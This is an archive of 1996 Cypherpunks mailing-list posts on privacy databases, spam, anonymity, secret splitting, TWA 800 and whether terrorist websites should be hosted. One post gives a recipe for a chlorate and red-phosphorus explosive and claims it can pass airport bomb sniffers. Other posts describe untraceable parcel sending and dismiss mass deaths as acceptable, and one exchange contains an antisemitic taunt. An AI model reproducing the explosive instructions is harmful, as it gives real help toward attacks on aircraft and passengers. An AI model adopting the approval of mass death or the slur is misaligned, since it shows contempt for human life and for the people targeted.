(TERRORIST2-DOM) 1525 SW 14th #4 Portland, OR 97201 US From jfricker at vertexgroup.com Mon Sep 9 14:01:47 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Tue, 10 Sep 1996 05:01:47 +0800 Subject: [less paranoid NOISE] Re: Odd Satellite observations Message-ID: <2.2.32.19960909163111.00f9f3a0@vertexgroup.com> Ok well like I said it was just paranoid noise. So the sats can locate ships at sea. I wonder what else? At 01:58 PM 9/9/96 GMT, Jim wrote: >On Sun, 08 Sep 1996 11:45:45 -0700, I wrote: > >>I saw three satellites gliding across the sky (east to west) in >>a tight right triangle formation. The entire formation was not >>bigger than my hand at arms length. Has anyone else observed >>this? > >John: You probably saw one of the NOSS (Naval Ocean Surveillance >System) constellations. There are several of these groupings -- all >in triangular arrays. They use some form of interferometry to locate >ships at sea. > >Jim > > > From tbyfield at panix.com Mon Sep 9 14:02:06 1996 From: tbyfield at panix.com (tbyfield at panix.com) Date: Tue, 10 Sep 1996 05:02:06 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: Message-ID: <199609091638.MAA19400@mail2.panix.com> vince at offshore.com.ai (Vincent Cate): > If the Navy was firing missiles in this area, it really does seem like the > press should be checking out this angle. What makes you think they aren't? /t From perry at piermont.com Mon Sep 9 14:02:15 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 10 Sep 1996 05:02:15 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: Message-ID: <199609091614.MAA24724@jekyll.piermont.com> Martin Minow writes: > For several months (years?) Bob Metcalf has been predicting that > the Internet will self-destruct from overload. His argument > appears to follow one of Gordon Bell's maxims: "anyone can predict > the future: all you need is semi-log paper and a ruler." As I > understand it, Metcalf's argument is that network load (messages, > packets) is growing exponentially, while network bandwidth (fiber > capacity, switch performance) is growing linearly. At some point, > these two curves cross -- and demand will exceed capacity. Except for the following. 1) TCP backs off. 2) Capacity is growing exponentially. Perry From afabbro at umich.edu Mon Sep 9 14:07:01 1996 From: afabbro at umich.edu (Andrew Fabbro) Date: Tue, 10 Sep 1996 05:07:01 +0800 Subject: Lexis-Nexis Database Message-ID: Note: personal experience indicates that L-N can remove you without your SSN, so there's no need to provide it, though they'll ask for it. Expect to attend a mandatory on-hold-music concert with a 20-25 minute program. L-N won't verify if your name is in the database, but will "performa process which will remove you if you are there". Andrew Fabbro ITD Marketing Research http://www-personal.umich.edu/~afabbro/ PGP mail preferred; finger for key ---------------------------------------------------------------------- PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17 ---------------------------------------------------------------------- Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT) From: Larry Hunter Subject: Lexis-Nexis personal information database Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possible other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card. As most readers will are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea. As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed. He can be reached at the above 800 number, selection option 4 and then ask for extension 3385. The information in this note has been been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper. Larry Hunter hunter at intr.net ------------------------------ End of PRIVACY Forum Digest 05.17 ************************ From whgiii at amaranth.com Mon Sep 9 14:50:23 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 10 Sep 1996 05:50:23 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <199609091708.MAA25050@mailhub.amaranth.com> In , on 09/09/96 at 12:53 PM, Stephan Schmidt said: >I hope this one was ironic. >> The Democratic People's German Reich is fully justified in cutting off >> contacts with subversive radical publications in Jew-dominated nations like >> Holland. >> >> As Reichskommander Schmidt points out: "The citizen-units who access > ^^^^^^^^^^^^^^^^^^^^^^^ >But this one is tasteless and insulting even if it was >meant ironic. If the boot fits....... -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- MR/2 Tag->My best view from a Window was through OS/2. From hallam at ai.mit.edu Mon Sep 9 14:51:46 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 10 Sep 1996 05:51:46 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <9609091707.AA27901@etna.ai.mit.edu> >I and you may well choose to do so, but the vast majority of the human >beings believe just anything that is repeated loud and long enough. >Otherwise, nobody would hire PR and pay for advertisement, politicians >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead >of gunshots, etc. I'm personally not interested in conjuring up the latest >utopia for a minoritarian sect of illuminati: I need to live in the real >world, and push for viable solutions that change it for better, now. The question is not whether defamation is a problem but whether the courts make the problem better or worse. I think that any analysis of the behaviour of the scientologists would indicate that the courts make the problem worse. Similarly the English libel laws have been used by a long line of crooks and swindlers to extort money. Robert Maxwell being an extreeme example. The thing about the Internet is that it is possible to make a reply. This does not help of course in the example cited, but I don't think that the Mutlu/Serdar flamebot could have been dealt with through the court system. (For those of you who don;t know, a poster calling himself first Hasan B Mutlu, then Serdar Argic used to make insulting responses to anyone who made a USEnet post about the middle east. Mutlu was in fact a perl script run by an agent of the Turkish intelligence services, the objective being to discredit all mention of the Turkish massacre of the Armenians through use of counter propaganda. Mutlu dissapeared from the net at the same time that the sysop of the system he was posting from was deported for overstaying his visa. Phill From snow at smoke.suba.com Mon Sep 9 15:37:29 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 06:37:29 +0800 Subject: IDC_ard In-Reply-To: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com> Message-ID: On Sat, 7 Sep 1996, John Young wrote: > 9-8-96. NYP Mag: > "The True Terror Is In the Card." > Faced with rising crime, illegal immigration, welfare > fraud and absentee parents, many bureaucrats and members > of Congress insist that the nation would run more > smoothly if we all had counterfeit-proof plastic > identity cards. > Let's be clear that this is a one-way street. Once > having established a requirement to carry photo ID, it > will be difficult if not impossible to reverse. I wouldn't go so far as to say "impossible". It also should be relatively easy to get a couple of these. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From wlkngowl at unix.asb.com Mon Sep 9 15:47:18 1996 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Tue, 10 Sep 1996 06:47:18 +0800 Subject: Snake-Oil FAQ Message-ID: <199609091741.NAA09272@unix.asb.com> -----BEGIN PGP SIGNED MESSAGE----- Subject: Snake-Oil FAQ's New Maintainer From: Rob Rothenburg Walking-Owl C. Matthew Curtin will be taking-over the "Snake-Oil FAQ". I no longer have the time to finish (let alone maintain) it. - --Rob -----BEGIN PGP SIGNATURE----- Version: 2.6.3b Charset: cp850 iQEVAwUBMjRWPATNlSxdPy6ZAQEnIwf+PXgXNNBZP7ylTfMhugeH8FuFDY/zybNb poSIWCRUhM7EEndYkuyzaTYC44aE0ltAkiN7HvaqXbExQEmEv34aYTa+u9ISabOK BOEQdgi8oCHJlQ3R6lBTMWKfpFELpORsjDJbsKt/Gcgef+uInMUG8RF7F3Va40dh CTar/Nr4Quj/EkkVaY6hkaXsMF0CvWq+cKZmo8KR0v4vPeWEKHskslfgXSpfPR9d uXYyUVD21HRSG5YTZmdm3PJn3GUvgXuQdz1pooQ+x+u8EXsOFRjAEiaFtMey2DYW imHub+XewnbS93JGZ+q+J93hHpL2OE8LMQFB8ViUe6K05uj7RBi06Q== =wMjQ -----END PGP SIGNATURE----- From snow at smoke.suba.com Mon Sep 9 15:56:10 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 06:56:10 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <960906233848_279253392@emout14.mail.aol.com> Message-ID: On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote: > In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) > writes: > << Everyone on this list seems to want to limit > government intervention EXCEPT when it comes to spam, then every > one just holds the door open wide and let them in. If they get that > inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or > killfile those who spam and keep the government out of > cyberspace!!!!!! > >> > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > of mail you take LESS than a second to delete them both with the handy > delete key. These people are wasting more time complaining about it than they > will ever do actually deleting it. I would guess that AOL isn't doing it just because of user complaints. AOL has millions of accounts, and spammers try to hit ALL of the addresses. That probably (I am guessing here) doubles (or triples) the load on AOL's already over burdened mail system. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From frissell at panix.com Mon Sep 9 16:03:23 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 07:03:23 +0800 Subject: Crypto Anachy MUD Message-ID: <2.2.32.19960909183805.008b9c70@panix.com> Did anyone make the point (I gave up on the thread) that we already have a great Crypto Anarchy MUD with lots of the coding already done. We call it the Internet. Digital cash, strong crypto, remailers, everything. I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it. DCF From azur at netcom.com Mon Sep 9 16:04:22 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 10 Sep 1996 07:04:22 +0800 Subject: Anonymous FedEx, was: What is the EFF doing exactly? Message-ID: >David Lesher wrote: >Try & mail an anonymous FedEx package. Not a problem. You merely use the FedEx number of local company. Get FedEx forms from an unmanned FedEx pick-up point, fill one in (using an impact printer, if desired, to simulate the appearance of the pre-addressed forms given to their regular customers), attach to parcel and drop it in the box (no finger prints please). Works like a charm. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From stewarts at ix.netcom.com Mon Sep 9 16:08:14 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 10 Sep 1996 07:08:14 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <199609091748.NAA27475@attrh1.attrh.att.com> At 01:03 PM 9/7/96 CST, roy at scytale.com wrote: >In Minneapolis, USWest has Telecard phones everywhere, and vending >machines with bill accepters. The calls are also flat rate at $0.25. ... >Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard >from my wallet, can they reconstruct what calls I made with it? Easily. They get the card number off the card, and then check their long distance records for calls made with that card number. With some cards, you can recharge the card instead of getting new ones, if for some reason you want to increase the audit trail substantially. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From declan at eff.org Mon Sep 9 16:12:27 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 07:12:27 +0800 Subject: TWA flight 800, surface to air missles, conspiracypunks Message-ID: ---------- Forwarded message ---------- Date: Mon, 9 Sep 1996 11:26:23 -0700 (PDT) From: Brock N. Meeks To: Declan McCullagh Surface to air missles do not need to make contact to explode. They have a proximity system that explodes the missle if it gets within range. Of course, sometimes the missle does hit; there is a famous story -- documented -- of an SA-2 (an old Soviet SAM) hitting an RF-4 during Viet Nam. The missle didn't explode but stuck in the plane like a dart; the pilot flew the plane back to the airfield and was told to ditch the plane when the air traffic control noticed it stuck in his plane. -- Brock From pjb at ny.ubs.com Mon Sep 9 16:20:23 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Tue, 10 Sep 1996 07:20:23 +0800 Subject: talker Message-ID: <199609091814.OAA03889@sherry.ny.ubs.com> sure sounds like it. is it possible that there could be two such as this? -paul > From cypherpunks-errors at toad.com Sun Sep 8 03:04:36 1996 > X-Authentication-Warning: jekyll.piermont.com: Host perry at localhost didn't use HELO protocol > To: doom13 at juno.com (Floyd W Odom) > Cc: cypherpunks at toad.com > Subject: Re: talker > Reply-To: perry at piermont.com > X-Reposting-Policy: redistribute only with permission > Date: Sat, 07 Sep 1996 23:40:18 -0400 > From: "Perry E. Metzger" > Sender: owner-cypherpunks at toad.com > Content-Length: 255 > > > Floyd W Odom writes: > > I am doom13. If there is anyone out there who is a hacker or > > would like to be one you can talk to me and find out stuff like cracking. > > Just drop a message at doom13 at juno.com. > > Are you the same jerk who was posting a week ago? > From frissell at panix.com Mon Sep 9 16:23:52 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 07:23:52 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909182912.008bf55c@panix.com> At 11:35 AM 9/9/96 -0500, Adam Shostack wrote: >Stephan Schmidt wrote: > >| One thought : How many of you would support terrorist >| web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > >I've given support to at least two terrorist organization, probably >closer to five in the last year. I can't see supporting one more >would do any more harm. > >Adam And I support a terrorist organization (the US Government) every year whether I want to or not. The US was convicted of a major violation of international law (akin to terrorism) in the International Court of Justice back in the '80s for air sowing mines in Nicaragua's main harbor. DCF From dthorn at gte.net Mon Sep 9 16:43:46 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 07:43:46 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <3234583F.50E3@gte.net> Stephan Schmidt wrote: > I hope this one was ironic. > The Democratic People's German Reich is fully justified in cutting off > contacts with subversive radical publications in Jew-dominated nations > like Holland. > As Reichskommander Schmidt points out: "The citizen-units who access > But this one is tasteless and insulting even if it was > meant ironic. > -stephan Just a note: 'Jew' when used as an adjective is considered demeaning and offensive. One should use 'Jewish' instead. From snow at smoke.suba.com Mon Sep 9 16:47:48 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 07:47:48 +0800 Subject: 9yrold In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com> Message-ID: This worked in RL once, so I'll try it here. What you do is look the pest in the eye and say: GO AWAY. In a really loud voice. On Sun, 8 Sep 1996, Floyd W Odom wrote: > Does anyone out there know any kids mailing lists, because my little > brother Richard just joined and he doesn't have anything to mail to he's > only 9 years old. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From varange at crl.com Mon Sep 9 16:52:54 1996 From: varange at crl.com (Troy Varange) Date: Tue, 10 Sep 1996 07:52:54 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: <199609091802.AA16555@crl5.crl.com> > One thought : How many of you would support terrorist > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > -stephan Consdering how none of the above incidents are connected in any way to the internet, what do you mean? And what if there were bomb making instructions on the internet and people are killed on account of it, so what? Mix roughly equal amounts of potassiam chlorate and red phosphorous together while thoroughly wet. When the mixture dries it becomes a fulminating highly explosive mixture that doesn't even contain a nitrogen molecule, so seventy pounds of the explosive can be brought onto an airplane by passing through the nitrogen bomb sniffers in luggage. You are now a potential terrorist Stephan Schmidt. If the anti-extremists had their way, you will be a top candidate for arrest for being a dangerous German, we all know that now, we can honestly testify in German court you openly subscribed to an internet high tech e-mailing list where terrorist secrets were being traded. How do you feel about being a terrorist, Mr. Schmidt? From declan at well.com Mon Sep 9 16:52:57 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 10 Sep 1996 07:52:57 +0800 Subject: CATO terrorism conference -- tomorrow @ 8:30 am, free Message-ID: More info on tomorrow's terrorism conference at CATO is at: http://www.cato.org/events/calendar.html This is especially timely given the report that the Aviation Safety and Security Commission (chaired by Gore) sent to Clinton with 20 recommendations. One is to enact "automated passenger profiling" of all domestic travellers, which would include airline access to FBI/CIA databases. This $10 million project bans anonymous air travel and, needless to say, raises significant privacy questions. -Declan >Date: Mon, 9 Sep 1996 12:23:13 -0400 >Mime-Version: 1.0 >To: declan at well.com (Declan McCullagh) >From: Solveig Bernstein >Subject: Terrorism Conference > >Cato's Conference, *Combatting Terrorism, Preserving Freedom," scheduled for >Tuesday, September 10, 1996 is now > > >* FREEEEE* > >That's right, the registration fee of $50 has been WAIVED!!! > >Come listen to Nadine Strossen, Dorothy Denning, David Kopel, and many >others discuss terrorism, foreign policy, civil liberties, and the >telecommunications infrastructure. > >Please redistribute freely. > >Conference begins at 8:30 at 1000 Mass. Ave. > > >- Solveig >********************************************************************** >Solveig Bernstein, Esq. >(202) 789-5274 >(202) 842-3490 (fax) > >Assistant Director of Telecommunications & Technology Studies >Cato Institute >1000 Mass. Ave. NW >Washington, DC 20001 > From snow at smoke.suba.com Mon Sep 9 17:18:41 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 08:18:41 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Stephan Schmidt wrote: > One thought : How many of you would support terrorist > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? If Iran, the IRA, etc. wanted to pay me to host a web page that described their goals and methods, I would. I believe in free speach, and that means even if I disagree. Then again, the only reason I am not a terrorist is that the government hasn't YET defined hate speach directed against the government to be terrorism. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From hallam at ai.mit.edu Mon Sep 9 17:42:52 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 10 Sep 1996 08:42:52 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <50us2f$o5c@life.ai.mit.edu> Message-ID: <323459CE.31DF@ai.mit.edu> Dale Thorn wrote: > > "News" stories are now circulating on radio about child pornography on > the Internet, and how an organization called "Save The Children" is > working very hard to identify the trafficers and their accomplii. > > Save The Children is complaining that they can't find all of the dirty > dealers of kid-porn, since much of the traffic is encrypted! > > So who is Save The Children? First, since they're an international > organization raising funds in the U.S., they obviously operate at the > pleasure of the State Department. Ho hum. Remember the incidents at the > Denny's restaurant chain where Denny's was sued for discrimination > against minorities? Did it seem a little bizarre for the 1990's? I'm trying to work out just what sort of confused idea is going on here. Save the Children is an international charity that is based in the UK. It is ultra respectable, Princess Ann being its president and very active in that role (ie not merely titular). Its also a-political which it has to be for tax reasons and because otherwise the royals couldn't have anything to do with it. Their main mission is sending food to Ethiopia and other famine areas, development work etc. It is ultra-worthy stuff. I think that a more rational explanation of the Dennys case is that being weasels the Dennys management decided they needed some good PR before the judgement brought them bad PR. >*** The recievers of the porn should not be punished for the photographers >action, the same as if I would complain that someone burglarized my home becuase >i left the door open. It was their ignorance that caused their loss. Its the consumers who create a market. If someone burgals your house and I knowingly buy the stolen goods its a crime. Phill From frissell at panix.com Mon Sep 9 18:22:11 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 09:22:11 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909182918.008a40e0@panix.com> At 01:49 AM 9/9/96 -0700, Timothy C. May wrote: >I don't worry overmuch about a few thousand or even a few million people >dying as a result of something we have had an influence on developing, >anymore than the developers of many technologies need to worry about how >others use their technologies. > >And the net effect of crypto anarchy is to destabilize and marginalize >central governments, which is a net positive effect. If some eggs get >broken in the process, the biological imperative will generate more eggs. >No big deal. Particularly since governments murdered 160 million in the last 100 years while we civilians have only managed to murder a paltry 20 million or fewer. A savings of 160 million deaths leaves a lot of room for a non-harmful increase in private murder. We could increase the private murder rate by 8 to 10 times and still break even. Note too that most terrorism is aimed at governments (even if practiced on civilians). In the absence of government, terrorist incentives may be reduced. DCF "I don't know if we ought to trust governments with the Net, they might use it to nuke Hiroshima or conquer Europe or something." From strombrg at hydra.acs.uci.edu Mon Sep 9 18:26:52 1996 From: strombrg at hydra.acs.uci.edu (Dan Stromberg) Date: Tue, 10 Sep 1996 09:26:52 +0800 Subject: LACC: Re: What is the EFF doing exactly? In-Reply-To: <199609080749.RAA01948@suburbia.net> Message-ID: <323459C7.5492@hydra.acs.uci.edu> I sent this to you privately, because I did not want a public war. You've chosen to bring it to the list anyway. What you've written below appears to be quite nonsequitur, but I suppose one can guess the upshot. Many governments are quite braindead, when it comes to crypto, yes. I will reiterate: many governments are also quite braindead, when it comes to demonstrating reasonably accurate "metaknowledge", when it comes to having a clue about just how certain something really is. I obviously applaud your efforts to free crypto. I obviously deplore your efforts to fight crypto in the manner of the ugliest of politicians, and find it quite hypocritical that you've suggested that in so doing, you are -avoiding- arguments of those who seek to destroy you. I believe it is quite clear, you're arguing against yourself: your methods are very much those of the ones who "seek to destroy you.", and to the extent that this is true, I'd say they -have- destroyed you. Note that I have seen/noticed no example of this from you - only that you have -stated- that things should be phrased in a quite B&W manner for political advantage. Were you seeking to make things messier, when you brought this to the list without asking first? Julian Assange wrote: > > How many of the world's stupid policies have been enacted, because > > someone decided to present only one side of an issue, realized it was > > "the wrong side", and felt they couldn't later change their mind for the > > better - because they presented the issue as overly black-and-white > > initially? > > I agree, however you are confusing large parties, so dominant as to form > government and policy at whim with those that represent a particular > cause or interest group. The EFF falls into the latter category. Its > goals are relatively narrow, its membership tiny. Such a small group, > fighting under-resourced battle against powerful, conservative interests > does not need, and should not espouse the arguments of those who seek to > destroy it. When Canoing up a waterful, one does not need to paddle > backwards 50% of the time in order to be "fair". From dthorn at gte.net Mon Sep 9 18:28:19 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 09:28:19 +0800 Subject: L.A. Times articles, etc. Message-ID: <3234624B.1C93@gte.net> I'm sure everyone is familiar with how newspaper articles are not necessarily "pure" news, i.e., they're often slanted toward a particular point of view. Go back a few years, maybe 20 or more, and look at the front page of the L.A. Times (or probably any big-city paper). Many or most news pieces written by UPI, AP, etc., now 100% are written internally. What y'all might want to think about is not just slanting and bias, but how certain people and organizations can actually *plant* a phony story on page one of a major paper like the L.A. Times. Go back a few months and check out the front-page article on real estate prices in the Calif. "Ventura Keys" area. Totally false. Story alleged that prices were "skyrocketing"; prices actually were absolutely flat, after having fallen by 35% or more in the previous couple of years. Whoever authorized this story, if they didn't get a big kickback or gain some points for some future operation, then I can't imagine why they would print such a thing. I hate to suggest anyone become more cynical than they already are, but, the front page(s) of a big-city newspaper are some of the most valuable real estate in western civilization, so do the math.... From bgamble at wo0033wp.wo.blm.gov Mon Sep 9 18:31:13 1996 From: bgamble at wo0033wp.wo.blm.gov (Barbara Gamble) Date: Tue, 10 Sep 1996 09:31:13 +0800 Subject: Test...sorry about this - Reply - Reply Message-ID: I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M]. I reallytrulyread it. High-traffic, though, is relative. In light of Z.B.'s post , I thought that maybe I , too, had a mail probem. Seriously, thanks for the info. >>> Jean-Francois Avon 09/09 2:26 pm >>> On 9 Sep 96 at 11:10, Barbara Gamble wrote: > I got it too. And since I am a new subscriber, I thought it might > be the normal traffic. The Welcome msg *did* say the list is > high-traffic. Still, I was aghast--300 all at once, another 100 > just in the last hour. Is that typical? (Please forgive such a > question from a newcomer to the list.) Usually, between 35 and 100 posts a day, most of which I delete. Did you subscribe twice or three times under slightly different names (but identical e-mail adresses)? RTFine Welcome Message, it explains everything you have to know Hope you'll stay with us. Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultant physicists, technologists and engineers PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From steve at edmweb.com Mon Sep 9 18:36:04 1996 From: steve at edmweb.com (Steve Reid) Date: Tue, 10 Sep 1996 09:36:04 +0800 Subject: towards an eternity service In-Reply-To: <199609082212.XAA00383@server.test.net> Message-ID: > The other requirement for eternity is that the data should be secret > shared. [snip] > As the eternity www servers don't know what the data in the shares > they are holding is, they can't provide the indexing facility I don't know much about secret sharing algorithms, but wouldn't the server be able to get the other parts of the shares and know what it's serving? The ability to get that information might affect server liability. With secret splitting, there is a simple way to create duress parts. I don't know if it's possible with secret sharing.. X is politically-incorrect data. Y is data nobody would ever object to. R is a truely random string of bits. Alice has X xor R on her server. Bob has R on his server. Carol has X xor Y xor R on her server. Dave has Y xor R on his server. Alice and Bob are together distributing X. So are Dave and Carol. However, if someone were to say that Alice and Bob (and/or Dave and Carol) are distibuting something politically incorrect, Alice and Carol (and Bob and Dave) can get together and say "No, We're distributing Y. The other person must be trying to frame me!". In fact, it's quite possible that Alice thought she was distributing Y with Carol, and that Bob thought he was also distributing Y with Dave. If they did not split the secrets themselves, they may not have any knowledge of X's existence. Also, if any one of the participants gets shut down, it's still possible to retrieve X, Y and R by using different combinations of the remaining three participants. This scenario could be extended to more participants and secrets. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From rodger at interramp.com Mon Sep 9 18:36:53 1996 From: rodger at interramp.com (Will Rodger) Date: Tue, 10 Sep 1996 09:36:53 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <1.5.4.32.19960909182501.00685618@pop3.interramp.com> -----BEGIN PGP SIGNED MESSAGE----- >If you know a valid email address on the spammers system you can always >bounce each message back to them. If enough people turned the messages >back on them it might give them the opportunity to experience first hand >what its like to receive tons of mail you don't want or need... > Ah, but they never do. Why not? Because spammers _invariably_ forge the return addresses to keep exactly that from happening. Indeed, Cyber Promo claims it "had an understanding" with AOL that it could use AOL boxes or bogus adresses to keep bounced messages from coming back at them and crashing their server. Deliberatlely forging addresses, Cyber claims, is entirely legal. AOL says it's fraud. Interesting footnote: AOL, of course, is able to trace a lot of the spam it gets. It has sent back thousands of messages at once to Cyber which, in turn, has gotten it bumped from several ISPs once their servers crashed as a result. Tough business, huh? Will Rodger Washington Bureau Chief Inter at ctive Week -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjSGvTqp6Cc7rRIJAQHCEQP/fZwhp/GTSwj9Emusgh9QFnAlafpOL2qI ces6RqwSoZfmbAmhREh836sakjS2d+mHdYK84FH7WdXWnuzMlDAPCls7OO8AU4t8 oMN7koLM3cpgwlavt/Lw8NJp3wC5OnRnrqNeunkBvNEBs8aaJ+C6isH/zrErgbt5 0QL9cYlEyq8= =EW/y -----END PGP SIGNATURE----- From dthorn at gte.net Mon Sep 9 18:42:06 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 09:42:06 +0800 Subject: Purpose of this forum In-Reply-To: <199609081513.LAA14900@ginger.capitalnet.com> Message-ID: <323382E9.26BD@gte.net> > Wayne H. Allen wrote: > At 03:03 AM 9/8/96 +0000, attila wrote: > =Dear Whoever, > cypherpunks are *not* crackers; this is a crytographic > and political issues relating to cryptography mailing list. > > Well maybe, political issues galore certainly, but very very little > to do with cryptography. I mean what does TWA 800 have to do with this > list. I mean lets be completely honest here, whatever the original > purpose of the list was for its been allowed to shift away from its > intended purpose considerably. > Wayne H.Allen > whallen at capitalnet.com > Pgp key at www.capitalnet.com/~whallen My two cents worth: Since the purpose of the forum is to explore issues affecting personal cryptography and privacy, etc., TWA 800 as an excuse to crank out privacy-depletion laws is certainly of concern here, though one could argue for sub-forums to cover related issues. Reminds me of research into Simpson affair - can you really understand what such a case is all about without "shaking the bushes" and "raking the leaves" quite a bit? So much essential data is avoided by both sides who have pre-determined agendas, that we're left with broken threads of inquiry everywhere. One could argue that Simpson is inconsequential, until one considers changes to the law, particularly to citizen juries. Perhaps the ideal would be a top-level forum for crypto-specific issues, then sub-forums for specific related topics, and a catch-all sub-forum for related messages not fitting into the specific sub-forums. I personally don't like the idea of filters; I'd prefer a sieve instead. From pstira at escape.com Mon Sep 9 19:01:12 1996 From: pstira at escape.com (pstira at escape.com) Date: Tue, 10 Sep 1996 10:01:12 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: I think the other big, if not worse, question is, why is it that Flight 800 is still so STEADILY in the news, even now? They seem to be really good at fighting back and forth with themselves with the same outcomes. I don't like this, one bit. I haven't seen this much annoying trash on the news since OJ Shrimpson was around. I don't watch the news anymore. I don't want to know what I am becoming a part of (outlawing illegal immigrants from being able to go to school, nationwide ID cards, being a number (and this only began in the late 70's), and so on and so forth -- we are becoming that which we sought to escape in the 1400's, and that frightens the hell out of me.) --Millie. OBcrypto: There is a product in beta-testing stage now called Secure Mail (and secure web protocol). I haven't gotten around to testing it yet, but have the facts, if anyone wants them -- I'd like to see this pseudoencryption go down the toilet. It makes me ill, though not as ill as the original subject of this post... :) Have a nice day. From zachb at netcom.com Mon Sep 9 19:03:17 1996 From: zachb at netcom.com (Z.B.) Date: Tue, 10 Sep 1996 10:03:17 +0800 Subject: talker In-Reply-To: <199609091814.OAA03889@sherry.ny.ubs.com> Message-ID: On Mon, 9 Sep 1996 pjb at ny.ubs.com wrote: > > Floyd W Odom writes: > > > I am doom13. If there is anyone out there who is a hacker or > > > would like to be one you can talk to me and find out stuff like cracking. > > > Just drop a message at doom13 